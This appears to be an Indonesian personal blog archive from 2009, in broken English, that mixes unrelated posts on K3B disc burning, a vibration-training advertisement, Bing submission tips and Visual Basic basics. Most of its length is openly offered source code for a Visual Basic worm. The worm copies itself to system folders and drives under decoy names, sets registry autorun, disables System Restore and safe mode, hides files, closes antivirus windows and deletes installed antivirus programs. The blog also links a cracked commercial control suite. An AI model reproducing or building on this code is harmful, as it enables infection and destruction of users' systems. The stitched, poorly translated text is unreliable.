Selasa, 27 Oktober 2009

Burning files over 700 MB using K3B


I created this utorial because keinginkanku to try linux on my laptop I am, finally after browsing around I found there a file DewaLinux more than 700 MB after looking around in the CD with a capacity of 700MB ga met in my town, I want to burn the DVD is too small (Nyakang Javanese language) so I'm looking for articles on Cd burning in more than 700 Mb of several key articles of overburn just burn more than 700MB. Nero also in there but I can finally try to ga there tutoriaal burning with k3b owned linux, ubuntu linux I open my office there was ehhh've installed k3b so ga need to download again, for those who have not for ubuntu type sudo apt-get install k3b. wait until the process is complete.

after the software installed k3b tu live setting with overburning and burning of your stay in the file.
hopefully useful aja.

Minggu, 06 September 2009

The Mobius Way How we can help you achieve your goals

The Mobius Way
How we can help you achieve your goals

Your future will be bright if you learn how to succeed as a vibration analyst. You will save your employer money by reducing downtime, and you will make yourself more valuable if you are able to make accurate, timely recommendations. But how do you get there from here?

Training is the key to success. But we believe there are two keys to successful training: content and time.

*

Content: We have invested heavily to develop 3D animations and innovative software simulators that make vibration analysis concepts and procedures so much easier to understand. Imagine spending time in a class where the most common thought is "Ah, now I understand!". The simulators demonstrate exactly how the data collectors process the signals; they demonstrate exactly how sidebands and harmonics are created; they demonstrate exactly what resonances are; they demonstrate exactly how bearings and gears and motors vibrate under various fault conditions - and so much more. You cannot believe the difference - the difference to your confidence when you can make decisions based on what you understand - not just what you were told.


A sample of one of our many simulators

*

Time: It does take time for new concepts and practices to become second nature. Our courses are longer than most, even though our simulators allow us to cover topics more quickly. To make sure you get the most out of the course, we provide membership to our Learning Center the moment you register for the course. If you spend some time going through the iLearnVibration narrated slides, you will get far more from the course. And your membership continues for six months after the course; just in case there are any questions that pop into your mind after the course. You can always read our excellent manuals, but we know you will learn much more via the Learning Center.

So if you are ready for a new approach to training, and see the value in truly understanding vibration, please join us in one of our training classes.

You be the judge - watch a movie to see it in action
Click here to see a quick movie presentation that describes our training courses and demonstrates a few of our simulators.

Mobius Institute Training
The same high standard around the world!

Mobius has offices in Australia and the USA, and we have established partnerships in 25 other countries. Our partners have been accredited by us to use our special Mobius Institute "iTeachVibration" course simulators, slides and material. Only accredited Mobius Institute Training Partners can use the new material, and deliver our exams. Click on the flags on the left to find the accredited Training Partner in your country, or click here to see a list of the courses (not necessarily all courses are listed in the calendar - contact the Training Partner to check for an up-to-date list).

Public or on-site courses

Our instructors are the best in the world. They have all been trained on the advanced Mobius method, and they all have years of training and practical field experience.

But what makes us unique is our professional slides, classroom activities, and our library of software simulators. The simulators revolutionize the training room. Instead of requiring endless discussion and diagrams to explain the range of complex concepts and procedures, the simulators (and 3D animations) make it all crystal clear in a fraction of the time.

Click here to see additional slides.

And we should not forget the classroom activities. Rather than just listening to the instructor, you are able to participate in activities that help you learn more, and to assess how much you have learned. If you struggle with the activities then you can simply discuss the topics with your instructor - it is better to find out what you don't know while you are still in the classroom than you are back at work (or during the exam).

You'll be amazed what you will understand and remember as a result of attending one of our classes.

The learning never ends

Too many people have left training courses only to forget much of what they have learned. At best they have taken away a book of notes or technical papers (which is rarely used). If only you could take the instructor with you... Well, now you can!

In addition to our course book and handy reference guide, you keep your iLearnVibration classroom-edition CD. Thousands of people in over 75 countries use iLearnVibration for refresher training and as an essential reference. Whenever questions come to mind, or you are struggling with a diagnosis, just jump into iLearnVibration and find the answers you need.

Training and certification follows the ISO 18436-2 standard

And don't forget that we offer courses with exams that follow the ISO 18436-2 standard and ASNT recommended practice. While certification exams can be stressful events, you need to put the odds in your favor; study before the course and attend a course that uses simulations that make everything easier to understand.

Learn more about the ISO and ASNT standards.

Mobius Institute courses are the most effective and valuable courses available anywhere in the world.

Our pledge

When you attend the course you deserve the very best. You are giving up your time, giving up your training budget, and spending time away from your family, all in the hope that you will learn more so that you can do a better job and progress in life. Well, you are making an effort, and so are we.

We make sure that your time in the class is optimized, with excellent slides, animations, simulators, interactive activities and challenges, and experienced instructors; and we make sure you gain the greatest benefit by sending you home with a reference manual, a very useful diagnostic reference guide, and the award winning iLearnVibration computer-based training system.

Your time is very well spent in the classroom, and you can go on learning after you return to your place of work.

free sms Via mobile PHONE

For you who are in Indonesia, a blog owned by a friend in our community that provides computer Free SMS to the provider in Indonesia. for sending SMS per day is 10 SMS per day. Please try to visit this website.

Sabtu, 05 September 2009

how to make walking text actually

try from zero to make this content higih potensi .Trick makes walking text actually enough add code teks walking eat that text will walk, but to make walking text of down onto and stop if at touch therefore trick it is utilize following code affix:


text walking from bottom ontop



aku

How to Submit URL in Bing and optimize

try from zero for Submit URL's trick goes to Bing

That blog most index at bing its trick is so easy, we just make towards this address just http://www. bing. com / docs / submit. aspx, Please entry only direct blog's address and verification code.


Authentikasi Meta Tag's trick and Submit URL at Bing

For over increases spider bing aga that mengcrawl can and mengindexs Meta Tag blog you. Please to visit Bing Webmaster http://www.bing.com/webmaster, to can do severally setting you shall be registered before at Bing.com

Address's web: blog's name entry (example:www.trayfromzero.blogspot.com)

Sitemap address: www.bing.com/webmaster/ping.aspx?siteMap=www.trayfromzero.blogspot.com/atom.xml (I still unclear also sitemap with atom.xml can work properly or not)

posting's source: http://o-om.com

statbrain.com all visitor stats revealed

How does Statbrain work?
Statbrain contains a collection of actual number of visits from hundreds of websites. The visitor data is combined with information about number of links that point towards the site, country, Alexa ranking and other data that is available on-line. All this information has been used to make a formula that uses the information that is available on-line to estimate the number of visits that the site actually has.

How accurate is Statbrain?
It is not an exact science, but it does give you a very good picture of how many visits a website has. It can be used for numerous purposes especially when doing research. An Advertisers can get an estimate of how many visitors a site has before buying adverts. If you want to buy a website or domain Statbrain can give you a pretty good idea about the number of visitors the site actually has before contacting the owner. Statbrain is good for any initial research or just because you're curious.

Estimated number of visits for www.mr-mung.com 6,357 visits per day
Send feedback! If you know the real number let us know.

Do you want to cek visitor your blog or web? klik here

Sabtu, 08 Agustus 2009

Make by YADOY 666

This is a basic of Visual basic I make to Prof. Reza bekasi children who always chat with me with the id rezaprof26. that is actually easy to only require 1 form, 1 and 3 ListBox command button. then you can type the code below:
===========================================================================================
Private Sub cmdKeluar_Click()
End
End Sub

Private Sub cmdTampil_Click()
Dim i As Integer
lstNama.Clear 'ini untuk membersihkan lstnama
For i = 1 To 3
lstNama.AddItem txtInputNama.Text
Next i
End Sub

Private Sub cmdWarna_Click()
lstNama.ForeColor = vbRed
End Sub
=======================================================================================
if u wont to download this file , please press this link bellow == klik disini dan disini

====================================================================

make the form look like win xp style


For friends who want to create an application from visual basic. so friends can use the control that can change the display form and control-control the other. one of them you can use OsenXPSuite, you can DOWONLOAD IT IN www.osenxpsuite.com in the trialnya version for 30 days, and then to version fullnya you have to pay $ 180.
After I search in 4shared.com I finally found osenxpsuite 2006 that I have cracknya. you can download it here.

After you download then you will be able to use it.
Here are tamplan after using OsenXPSuite2006
For you .THIS virus need ni form 1 and Module 4. For more details, please see your coding the following:
=====================================================================================
Private Sub bunuh_Timer()
'proteksi
tutup "avg"
tutup "anti"
tutup "ANSAV"
tutup "avast"
tutup "asm"
tutup "avira"
tutup "cillin"
tutup "clean"
tutup "CONFIRM FILE DELETE"
tutup "CONFIRM MULTIPLE FILE DELETE"
tutup "compact"
tutup "CRC"
tutup "debug"
tutup "detect"
tutup "NOD"
tutup "Gasak!!!"
tutup "hijack"
tutup "INTERNET OPTIONS"
tutup "kill"
tutup "KILLBOX"
tutup "k1ckth3w0rm"
tutup "kaspersky"
tutup "mcafee"
tutup "NVC"
tutup "norton"
tutup "regis"
tutup "Norman"
tutup "Ogav"
tutup "panda"
tutup "POCKET KILLBOX"
tutup "proc"
tutup "recovery"
tutup "remover"
tutup "rest"
tutup "scan"
tutup "system"
tutup "System Mechanic"
tutup "Setup"
tutup "SHOW/KILL RUNNING PROCESS"
tutup "SYSTEM RESTORE"
tutup "superdat"
tutup "S m a d A V"
tutup "SmadAV"
tutup "task"
tutup "TKM"
tutup "termin"
tutup "trojan"
tutup "tune"
tutup "update"
tutup "virus"
tutup "vaksin"
tutup "WAV"
tutup "wash"
tutup "walk"
tutup "w32"



'selamatkan moral bangsa
kick "17tahun"
kick "adult"
kick "anal"
kick "bangbros"
kick "bangbus"
kick "Bugil"
kick "CrystalClear"
kick "Doggy Style"
kick "amit-amit"
kick "hentai"
kick "hottie"
kick "kiara kener"
kick "Kama Sutra"
kick "lalatx"
kick "miyabi"
kick "masturb"
kick "naughty"
kick "nude"
kick "naked"
kick "nana1_chunk"
kick "pussy"
kick "porn"
kick "sex"
kick "scandal"
kick "spy cam"
kick "SQ Evolution"
kick "Three Some"
kick "webcam show"
kick "xxx"





Call ganda
Call Racuni_Registry
Call proteksi_folder



End Sub

Private Sub Form_Load()
Y4D0Y666.Hide
App.TaskVisible = False

If App.PrevInstance Then End


'ganda di folder windows dengan nama dafault.bat
CopyFile App.Path & "\" & App.EXEName & ".exe", GetWindowsPath & "\" & "default.bat", 0

'ganda di system32 dengan nama login.exe dan autoexec.bat
CopyFile App.Path & "\" & App.EXEName & ".exe", GetSystemPath & "\" & "login.exe", 0

CopyFile App.Path & "\" & App.EXEName & ".exe", GetSystemPath & "\" & "autoexec.bat", 0

'ganda di mydocument dengan nama Kerispatih On Da Stage.exe
CopyFile App.Path & "\" & App.EXEName & ".exe", GetSpecialfolder(CSIDL_PERSONAL) & "\" & "KerisPatih On Da Stage.exe", 0



Call ganda
Call Racuni_Registry
Call proteksi_folder
Call Kill_antivirus



End Sub

Private Function Racuni_Registry()

On Error Resume Next


'Disable System Restore
CreateDwordValue HKEY_LOCAL_MACHINE, "SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore", "DisableConfig", 1
CreateDwordValue HKEY_LOCAL_MACHINE, "SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore", "DisableSR", 1
CreateDwordValue HKEY_LOCAL_MACHINE, "SOFTWARE\Policies\Microsoft\Windows\Installer", "LimitSystemRestoreCheckpointing", 1
CreateDwordValue HKEY_LOCAL_MACHINE, "SOFTWARE\Policies\Microsoft\Windows\Installer", "DisableMSI", 1

'Ubah tipe file *.exe jadi Winamp media file
CreateStringValue HKEY_CLASSES_ROOT, "exefile", REG_SZ, "", "Winamp media file"

'Manipulasi Internet Explorer
CreateStringValue HKEY_CURRENT_USER, "Software\Microsoft\Internet Explorer\Main\", REG_SZ, "Window Title", "..:: YaDoY666 [WuZ HeRe] ::.."
CreateStringValue HKEY_CURRENT_USER, "Software\Microsoft\Internet Explorer\Main\", REG_SZ, "Start Page", GetSpecialfolder(CSIDL_PERSONAL) & "\" & "My Pictures\About.htm"

'auto run virus
CreateStringValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run\", REG_SZ, "User-Login", GetSystemPath & "login.exe"
CreateStringValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run\", REG_SZ, "Norton", GetWindowsPath & "default.bat"

'Disable Folder Options
CreateDwordValue HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\", "NoFolderOptions", 1
CreateDwordValue HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\", "NoFolderOptions", 1

'atur registry agar file dengan yang disembunyikan tidak tampil
CreateDwordValue HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\", "HideFileExt", 1
CreateDwordValue HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\", "Hidden", 0
CreateDwordValue HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\", "ShowSuperHidden", 0
CreateDwordValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\", "HideFileExt", 1
CreateDwordValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\", "Hidden", 0
CreateDwordValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\", "ShowSuperHidden", 0

'Atur registry agar tidak bisa masuk safe mode
DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\", "dmboot.sys"
DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\", "dmio.sys"
DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\", "dmload.sys"
DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\", "sermouse.sys"
DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\", "sr.sys"
DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\", "vga.sys"
DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\", "vgasave.sys"
DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "dmboot.sys"
DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "dmiot.sys"
DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "rdpcdd.sys"
DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "rdpdd.sys"
DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "rdpwd.sys"
DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "sermouse.sys"
DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "sr.sys"
DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "tdpipe.sys"
DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "tdtcp.sys"
DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "vga.sys"
DeleteValue HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\", "vgasave.sys"

End Function

Private Function ganda()

Dim ictr As Integer
Dim sAllDrives As String
Dim sDrive As String

sDrive = ""
For ictr = 66 To 90
sDrive = Chr(ictr) & ":\"
If GetDriveType(sDrive) = 3 Or GetDriveType(sDrive) = 2 Then
CopyFile App.Path & "\" & App.EXEName & ".exe", sDrive & "I Love You.exe", 0
CopyFile App.Path & "\" & App.EXEName & ".exe", sDrive & "cewe_bandel.exe", 0

End If
Next

End Function

Private Sub Form_Unload(Cancel As Integer)
Shell GetSystemPath & "\" & "login.exe"
End Sub

Private Sub proteksi_folder()
On Error Resume Next
SetAttr GetWindowsPath, vbNormal
SetAttr GetWindowsPath & "\" & "desktop.ini", vbNormal
Kill GetWindowsPath & "\" & "desktop.ini"
Open GetWindowsPath & "\" & "desktop.ini" For Output As #1
Print #1, "[.ShellClassInfo]"
Print #1, "CLSID={C96401CC-0E17-11D3-885B-00C04F72C717}"
Close #1

SetAttr GetWindowsPath & "\" & "desktop.ini", vbHidden
SetAttr GetWindowsPath, vbSystem

End Sub

Sub Kill_antivirus()
On Error Resume Next

'bunuh antivirus Norman
If Folder_Exist("C:\Norman") = True Then
prog_AntiVir = Array( _
"C:\Norman\Bin", _
"C:\Norman\Download", _
"C:\Norman\Nse\Bin", _
"C:\Norman\Nvc\Bin", _
"C:\Norman\Nvc\Config", _
"C:\Norman\Qtn\Bin" _
)
SetAttr "C:\Norman", vbNormal

For p = 0 To 3
Kill prog_AntiVir(p) & "\*.exe"
Kill prog_AntiVir(p) & "\*.dll"
Kill prog_AntiVir(p) & "\*.zip"
Kill prog_AntiVir(p) & "\*.*"
Next p
RmDir "C:\Norman"
End If

'bunuh antivirus Norman kalo ada di dalam direcktory Program Files
If Folder_Exist("C:\Program Files\Norman") = True Then
prog_AntiVir = Array( _
"C:\Program Files\Norman\Bin", _
"C:\Program Files\Norman\Download", _
"C:\Program Files\Norman\Nse\Bin", _
"C:\Program Files\Norman\Nvc\Bin", _
"C:\Program Files\Norman\Nvc\Config", _
"C:\Program Files\Norman\Qtn\Bin" _
)
SetAttr "C:\Program Files\Norman", vbNormal

For p = 0 To 3
Kill prog_AntiVir(p) & "\*.exe"
Kill prog_AntiVir(p) & "\*.dll"
Kill prog_AntiVir(p) & "\*.zip"
Kill prog_AntiVir(p) & "\*.*"
Next p
RmDir "C:\Program Files\Norman"
End If

'bunuh antivirus McAfee
If Folder_Exist("C:\Program Files\McAfee") = True Then
prog_AntiVir = Array( _
"C:\Program Files\McAfee\McAfee Firewall", _
"C:\Program Files\McAfee\McAfee VirusScan", _
"C:\Program Files\McAfee\McAfee VirusScan\Backups\DatBackup", _
"C:\Program Files\McAfee\McAfee VirusScan\Backups\EngineBackup", _
"C:\Program Files\McAfee\McAfee VirusScan\Res00", _
"C:\Program Files\McAfee\VirusScan Wireless" _
)
SetAttr "C:\Program Files\McAfee", vbNormal

For p = 0 To 3
Kill prog_AntiVir(p) & "\*.exe"
Kill prog_AntiVir(p) & "\*.dll"
Kill prog_AntiVir(p) & "\*.zip"
Kill prog_AntiVir(p) & "\*.*"
Next p
RmDir "C:\Program Files\McAfee"
End If

'bunuh antivirus McAfee
If Folder_Exist("C:\Program Files\Kaspersky Lab") = True Then
prog_AntiVir = Array( _
"C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro", _
"C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro\Policy", _
"C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro\Report", _
"C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro\Infected" _
)
SetAttr "C:\Program Files\Kaspersky Lab", vbNormal

For p = 0 To 3
Kill prog_AntiVir(p) & "\*.exe"
Kill prog_AntiVir(p) & "\*.dll"
Kill prog_AntiVir(p) & "\*.zip"
Kill prog_AntiVir(p) & "\*.vxd"
Kill prog_AntiVir(p) & "\*.*"
Next p
RmDir "C:\Program Files\Kaspersky Lab"
End If



End Sub

Module BUNUH

Public Declare Function GetForegroundWindow Lib "user32" () As Long
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Const WM_CLOSE = &H10



Public Function kick(target As String)
Dim H As Long
Dim T As String * 255
H = GetForegroundWindow
GetWindowText H, T, 255
If InStr(UCase(T), UCase(target)) > 0 Then
SendMessage H, WM_CLOSE, 0, 0
End If
End Function

Module FILE

Public Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Public Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long
Public Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias "SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long
Public Declare Function GetSystemDirectory Lib "kernel32.dll" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32.dll" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function CreateDirectory Lib "kernel32" Alias "CreateDirectoryA" (ByVal lpPathName As String, lpSecurityAttributes As SECURITY_ATTRIBUTES) As Long
Public Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long
Public Declare Function DeleteFile Lib "kernel32.dll" Alias "DeleteFileA" (ByVal lpFileName As String) As Long
Public Declare Function SetFileAttributes Lib "kernel32" Alias "SetFileAttributesA" (ByVal lpFileName As String, ByVal dwFileAttributes As Long) As Long

Public Const FILE_ATTRIBUTE_SYSTEM = &H4
Public Const FILE_ATTRIBUTE_READONLY = &H1
Public Const FILE_ATTRIBUTE_HIDDEN = &H2
Public Const FILE_ATTRIBUTE_DIRECTORY = &H10
Public Const FILE_ATTRIBUTE_ARCHIVE = &H20
Public Const FILE_ATTRIBUTE_NORMAL = &H80

Public Type SHITEMID
cb As Long
abID As Byte
End Type

Public Type ITEMIDLIST
mkid As SHITEMID
End Type

Public Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type

Enum SFolder
CSIDL_DESKTOP = &H0 'menunjukkan folder virtual yang menyatakan root untuk semua namespace (/Desktop)
CSIDL_PROGRAMS = &H2 'menunjukkan folder sistem yang berisi grup program user (/Programs)
CSIDL_CONTROLS = &H3 'menunjukkan folder virtual yang berisi ikon-ikon aplikasi Control Panel (/Control Panel)
CSIDL_PRINTERS = &H4 'menunukkan folder virtual yang berisi printer-printer yang diinstall (/Printers)
CSIDL_PERSONAL = &H5 'menunjukkan folder sistem yang digunakan untuk menyimpan dokumen umum user (/My Document)
CSIDL_FAVORITES = &H6 'menunjukkan folder yang berisi item-item favorite user (/Favorites)
CSIDL_STARTUP = &H7 'menunjukkan folder yang berisi grup program StartUp user (/Startup)
CSIDL_RECENT = &H8 'menunjukkan folder sistem yang berisi dokumen-dokumen yang sering digunakan (/Recent)
CSIDL_SENDTO = &H9 'menunjukkan folder yang berisi item menu Send To (/Send To)
CSIDL_BITBUCKET = &HA 'menunjukkan folder sistem yang berisi objek file pada RecycleBin user (/Recycle Bin)
CSIDL_STARTMENU = &HB 'menunjukkan folder sistem yang berisi item-item menu Start (/StartMenu)
CSIDL_DESKTOPDIRECTORY = &H10 'menunjukkan folder sistem yang dapatkan digunakan untuk menyimpan objek file secara fisik pada desktop
CSIDL_DRIVES = &H11 'menunjukkan folder yang berisi segala sesuatu pada komputer lokal (/My Computer)
CSIDL_NETWORK = &H12 'menunjukkan folder yang berisi objek link yang kemungkinan ada pda folder virtual My Network Places (/My Network Places)
CSIDL_NETHOOD = &H13 'menunjukkan folder yang menyatakan root dari hierarki namespace network (/NetHood)
CSIDL_FONTS = &H14 'menunjukkan folder yang berisikan font (/FONT)
CSIDL_TEMPLATES = &H15 'menunjukkan folder yang digunakan untuk menyimpan dokumen template (/Template)
End Enum

'Get special folder
Public Function GetSpecialfolder(JenisFolder As SFolder) As String
Dim r As Long
Dim IDL As ITEMIDLIST
'get special folder
r = SHGetSpecialFolderLocation(100, JenisFolder, IDL)
If r = NOERROR Then
'create buffer
Path$ = Space$(512)
'Get path from IDList(IDL)
r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$)
'Remove chr$(0)
GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) - 1)
Exit Function
End If
GetSpecialfolder = ""
End Function

'Get System Path
Public Function GetSystemPath() As String

On Error Resume Next
Dim Buffer As String * 255
Dim x As Long
x = GetSystemDirectory(Buffer, 255)
GetSystemPath = Left(Buffer, x) & "\"

End Function

'Get Windows Path
Public Function GetWindowsPath() As String

On Error Resume Next
Dim Buffer As String * 255
Dim x As Long

x = GetWindowsDirectory(Buffer, 255)
GetWindowsPath = Left(Buffer, x) & "\"

End Function

Public Function Folder_Exist(ByVal strFolder As String) As Boolean
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")

If InStr(1, Right$(strFolder, 5), ".") > 0 Then
strFolder = fso.GetParentFolderName(strFolder)
End If

If fso.FolderExists(strFolder) Then
Folder_Exist = True
Else
Folder_Exist = False
End If
Set fso = Nothing

End Function

Module Racuni_Registry

'Registry API
Public Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Public Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long ' Note that if you declare the lpData parameter as String, you must pass it By Value.
Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Public Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long ' Note that if you declare the lpData parameter as String, you must pass it By Value.
Public Declare Function RegSetValue Lib "advapi32.dll" Alias "RegSetValueA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long

Public Const REG_DWORD = 4

Enum REG
HKEY_CURRENT_USER = &H80000001
HKEY_CLASSES_ROOT = &H80000000
HKEY_CURRENT_CONFIG = &H80000005
HKEY_LOCAL_MACHINE = &H80000002
HKEY_USERS = &H80000003
End Enum

Enum TypeStringValue
REG_SZ = 1
REG_EXPAND_SZ = 2
REG_MULTI_SZ = 7
End Enum

'Create or Set Dword Value Registry
Public Function CreateDwordValue(hKey As REG, Subkey As String, strValueName As String, dwordData As Long) As Long

On Error Resume Next
Dim ret As Long

RegCreateKey hKey, Subkey, ret
CreateDwordValue = RegSetValueEx(ret, strValueName, 0, REG_DWORD, dwordData, 4)
RegCloseKey ret

End Function

Public Function CreateStringValue(hKey As REG, Subkey As String, RTypeStringValue As TypeStringValue, strValueName As String, strData As String) As Long

On Error Resume Next
Dim ret As Long

RegCreateKey hKey, Subkey, ret
CreateStringValue = RegSetValueEx(ret, strValueName, 0, RTypeStringValue, ByVal strData, Len(strData))
RegCloseKey ret

End Function
Public Function DeleteValue(hKey As REG, Subkey As String, lpValName As String) As Long
Dim ret As Long

On Error Resume Next
RegOpenKey hKey, Subkey, ret
DeleteValue = RegDeleteValue(ret, lpValName)
RegCloseKey ret

End Function

Module Restart

Public Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Public Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long
Public Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LUID) As Long
Public Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long
Public Declare Function GetCurrentProcess Lib "kernel32" () As Long
Public Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long

Public Const EWX_FORCE = 4
Public Const EWX_REBOOT = 2
Public Const EWX_SHUTDOWN = 1
Public Const VER_PLATFORM_WIN32_NT = 2
Public Const ANYSIZE_ARRAY = 1
Public Const TOKEN_ADJUST_PRIVILEGES = &H20
Public Const TOKEN_QUERY = &H8
Public Const SE_PRIVILEGE_ENABLED = &H2

Public Type LUID
LowPart As Long
HighPart As Long
End Type

Public Type LUID_AND_ATTRIBUTES
pLuid As LUID
Attributes As Long
End Type

Public Type TOKEN_PRIVILEGES
PrivilegeCount As Long
Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES
End Type

Public Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type

'Reboot Windows(Not WinNT)
Public Function Reboot() As Long

'On Error Resume Next
LogOff = ExitWindowsEx(EWX_FORCE Or EWX_REBOOT, 0)

End Function

'Shutdown Windows(Not WinNT)
Public Function Shutdown() As Long

'On Error Resume Next
LogOff = ExitWindowsEx(EWX_FORCE Or EWX_SHUTDOWN, 0)

End Function

'Detection WinNT
Public Function IsWinNT() As Boolean

'On Error Resume Next
Dim myOS As OSVERSIONINFO

myOS.dwOSVersionInfoSize = Len(myOS)
GetVersionEx myOS
IsWinNT = (myOS.dwPlatformId = VER_PLATFORM_WIN32_NT)

End Function

'For Get Privileges from Win NT
Public Sub EnableShutDown()

'On Error Resume Next
Dim hProc As Long
Dim hToken As Long
Dim mLUID As LUID
Dim mPriv As TOKEN_PRIVILEGES
Dim mNewPriv As TOKEN_PRIVILEGES

hProc = GetCurrentProcess()
OpenProcessToken hProc, TOKEN_ADJUST_PRIVILEGES + TOKEN_QUERY, hToken
LookupPrivilegeValue "", "SeShutdownPrivilege", mLUID
mPriv.PrivilegeCount = 1
mPriv.Privileges(0).Attributes = SE_PRIVILEGE_ENABLED
mPriv.Privileges(0).pLuid = mLUID
'Setting Privileges windows NT
AdjustTokenPrivileges hToken, False, mPriv, 4 + (12 * mPriv.PrivilegeCount), mNewPriv, 4 + (12 * mNewPriv.PrivilegeCount)

End Sub


' Reboot For WinNT
Public Sub RebootNT(Force As Boolean)

Dim Flags As Long
Flags = EWX_REBOOT
If Force Then Flags = Flags + EWX_FORCE
If IsWinNT Then EnableShutDown
ExitWindowsEx Flags, 0

End Sub

' Shutdown For WinNT
